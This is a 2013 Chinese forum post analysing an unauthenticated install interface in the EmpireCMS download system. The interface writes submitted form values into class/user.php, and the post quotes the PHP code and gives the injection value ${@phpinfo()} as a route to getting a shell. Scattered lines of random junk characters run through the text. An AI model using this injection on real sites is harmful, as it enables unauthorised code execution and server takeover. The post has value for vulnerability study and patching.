这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
" m' n. W2 T, E) k- v
7 d- {6 i' o' f
0 H. b U7 Z( M* u这是帝国的一套下载系统 如图" P( Y* |6 i* T# g2 C% L
ps(不需要任何账户和密码,直接写shell)
3 N$ b- g2 J0 W1 J1 U
由于很多站是由于下载要整合discuz 等等一些论坛....
: d" ^. L; T& d2 e6 Z
! y5 w S% Z7 l3 [而帝国他又有一个万能接口,如图 . i7 |6 \3 W1 D# V6 }# K
# O" \; J9 l0 d$ j
- B( ~& n$ | T3 K7 O7 ]而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码2 H1 |' y8 K0 b9 O9 [7 [+ K
3 Q% _* i8 v. O: _6 I# P5 y
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪# `# V; j' Z s( {
) p/ F6 @( a. c1 t+ ?$ h h4 K6 @' P在data/fun.php中的15行3 X& {& L. c2 H
1 t" h( C1 m# Q( a% u: t
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {8 `& K" g8 m8 w+ l
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
* q9 E5 x' y5 s3 @7 m5 @0 t2 g5 m, s. k0 [: \' Y$ p8 k# u! d
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
2 H8 ~5 Q" G2 E% {/ Q/ e8 l+ @
( r6 P! r/ v3 f他将传进来的变量进行了切割,然后赋给了$filetext
; N# g8 \5 X+ T- _1 g5 K! B) a/ M& \' R' v4 V$ @0 V
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了. G/ d4 ]& J5 ~' U4 W
: N5 B0 F4 P8 C! z. a
我们看看写入的结果,随便填一个
; K% u6 h# p& A( Z N" H+ v& z5 f" ^
9 o" A/ [$ q; L4 q0 {5 H* J; h9 S; j7 }$ z7 \5 b9 b$ d
' A3 p+ ?! n/ v7 ?( |. F: ^; x
9 K; P- W6 Q/ ]" h3 d0 S. l s4 q* t0 w" D* F3 x
- X* v! d# v5 U- U) G: B& Q% }9 f& l- z, o& K$ h- I
, J4 ~! O4 p: j; Z* N
) M* L H: `8 S+ N+ W+ e. {6 {; T2 [% N) c
% G; v+ ]4 Q, V+ C8 \( l6 S
' T; h5 v) K3 v. q0 f2 k7 f
9 L" t, n5 _" x. _& o0 z4 p6 K: G$ G
$ X S! ?( ]( d3 m# z X# \) }* U7 F4 Q, U K8 x. ^; d3 Q
2 H/ P1 t! a; g4 b
8 t6 U$ o0 h3 w* q8 o" R2 h" q$ k( @- k/ }9 ~
$ [* c# K. z! d: B6 a4 w
3 E$ D( w: Q- ~* L0 C
所以我们淫荡点,写个${@phpinfo()}试试
5 \# }; t# T% o( P% G然后访问以下class/user.php这个文件$ }; K; `; u( @$ C7 n: T5 q
日了吧 ) d* E+ s0 R2 {* ?) z
1 w( \$ v1 |8 U/ E+ D0 \
: Z) V% T' L, V# S- ^+ [- `" _5 @0 J( d. G
% _* r: q0 j6 f4 m) Y- v. Z
* k7 J- A1 [' l3 T; U2 {# g8 i7 c: c/ @% ~0 ]0 i) [1 u
| 
发表于 2013-1-23 09:34:37
收藏
支持
反对